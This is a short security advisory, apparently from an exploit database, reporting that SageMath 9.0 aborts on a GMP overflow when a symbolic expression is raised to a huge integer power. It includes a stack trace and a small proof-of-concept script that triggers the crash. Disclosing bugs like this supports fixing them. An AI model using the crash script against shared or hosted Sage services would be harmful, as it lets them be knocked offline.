Sagemath 9.0 Overflow / Denial Of Service

2022.09.11
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

sagemath 9.0 and reportedly later on ubuntu 20. sagemath gives access to the python interpreter, so code execution is trivial. We give DoS attacks, which terminates the sagemath process with abort(), when raising symbolic expression to large integer power. We get abort() with stack: gmp: overflow in mpz type #6 0x00007f55c83ee72e in __GI_abort () at /build/glibc-SzIz7B/glibc-2.31/stdlib/abort.c:79 #7 0x00007f55c56e0d20 in __gmpz_realloc () #8 0x00007f55c56dd2b0 in __gmpz_n_pow_ui () #9 0x0000000000000000 in GiNaC::numeric::power(long) const () #10 0x0000000000000000 in GiNaC::numeric::pow_intexp(GiNaC::numeric const&) const () The non-minimal testcase === #sagemath code, copyright Georgi Guninski def binnk3u(n,k): return ( (n/k)**(k)) n1=(2*10**3);d0=29004853178239;n0=SR(log(n1)); tt=binnk3u(n0+d0-1,d0); print("passed :(") ===


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top